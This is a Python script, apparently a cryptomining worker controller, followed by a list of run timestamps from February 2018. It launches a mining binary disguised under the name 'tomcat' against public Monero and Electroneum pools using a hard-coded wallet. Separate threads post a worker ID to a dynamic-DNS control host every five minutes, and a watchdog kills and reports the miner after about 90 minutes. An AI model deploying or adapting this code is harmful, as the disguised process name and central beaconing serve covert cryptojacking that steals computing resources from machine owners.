import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:08.110476
#2018-02-17 16:32:05.224811
#2018-02-17 18:20:08.630374
#2018-02-17 20:08:03.463351
#2018-02-17 21:55:08.180975
#2018-02-17 23:40:07.045082
#2018-02-18 01:31:03.843312
#2018-02-18 03:16:07.712707
#2018-02-18 05:05:08.435126
#2018-02-18 06:57:01.712121
#2018-02-18 08:45:08.495126
#2018-02-18 10:32:06.399772
#2018-02-18 12:17:01.517476
#2018-02-18 14:04:07.256136
#2018-02-18 15:54:02.140821
#2018-02-18 17:43:06.972026
#2018-02-18 19:30:09.264030
#2018-02-18 21:15:07.901253
#2018-02-18 23:03:07.159592
#2018-02-19 00:50:03.911457
#2018-02-19 02:37:06.393433
#2018-02-19 04:23:06.524694
#2018-02-19 06:07:05.397021
#2018-02-19 07:55:05.718396
#2018-02-19 09:46:08.607595
#2018-02-19 11:36:09.998273
#2018-02-19 13:22:06.078082
#2018-02-19 15:10:08.076661
#2018-02-19 16:59:01.724331
#2018-02-19 18:46:03.048022
#2018-02-19 20:36:01.971367
#2018-02-19 22:22:05.362434
#2018-02-20 00:07:07.463478
#2018-02-20 01:55:06.626830
#2018-02-20 03:44:03.596348
#2018-02-20 05:31:01.959214
#2018-02-20 07:15:09.481871
#2018-02-20 09:02:01.611226
#2018-02-20 10:45:09.022468
#2018-02-20 12:33:01.726182
#2018-02-20 14:18:04.179125
#2018-02-20 16:03:01.491067
#2018-02-20 17:48:11.370810
#2018-02-20 19:39:01.883219
#2018-02-20 21:26:07.590872
#2018-02-20 23:09:05.431806
#2018-02-21 00:54:07.041832
#2018-02-21 02:42:06.755589
#2018-02-21 04:31:05.006354
#2018-02-21 06:18:04.936240
#2018-02-21 08:04:01.475263
#2018-02-21 09:50:09.577740
#2018-02-21 11:40:10.893381
#2018-02-21 13:29:01.771122
#2018-02-21 15:14:03.651449
#2018-02-21 17:03:08.777967
#2018-02-21 18:50:12.382465
#2018-02-21 20:39:06.242371
#2018-02-21 22:24:01.252122
#2018-02-22 00:14:01.510056
#2018-02-22 02:02:07.904111
#2018-02-22 03:49:05.451979
#2018-02-22 05:36:01.396403
#2018-02-22 07:21:02.097381
#2018-02-22 09:08:07.338259
#2018-02-22 10:56:07.769612
#2018-02-22 12:41:07.624136
#2018-02-22 14:28:05.284176
#2018-02-22 16:15:08.737645
#2018-02-22 18:03:14.103935
#2018-02-22 19:51:05.489423
#2018-02-22 21:40:01.278597
#2018-02-22 23:26:06.146506
#2018-02-23 01:13:07.629162
#2018-02-23 02:59:05.584627
#2018-02-23 04:46:07.577410
#2018-02-23 06:33:03.685982
#2018-02-23 08:19:06.341911
#2018-02-23 10:36:06.975023
#2018-02-23 12:31:05.196014
#2018-02-23 14:18:05.231307
#2018-02-23 16:09:01.742908
#2018-02-23 17:54:01.572379
#2018-02-23 19:39:05.696145
#2018-02-23 21:23:06.359399
#2018-02-23 23:11:05.344416
#2018-02-24 00:59:06.473627
#2018-02-24 02:53:04.402408
#2018-02-24 04:43:06.698018
#2018-02-24 06:27:05.267226
#2018-02-24 08:16:07.513821
#2018-02-24 10:01:04.323899
#2018-02-24 11:59:02.123983
#2018-02-24 13:46:05.568026
#2018-02-24 15:39:04.930322
#2018-02-24 17:33:03.701422
#2018-02-24 19:20:03.717578
#2018-02-24 21:10:04.755637
#2018-02-24 23:43:05.479249
#2018-02-25 03:40:05.747298
#2018-02-25 07:26:03.469003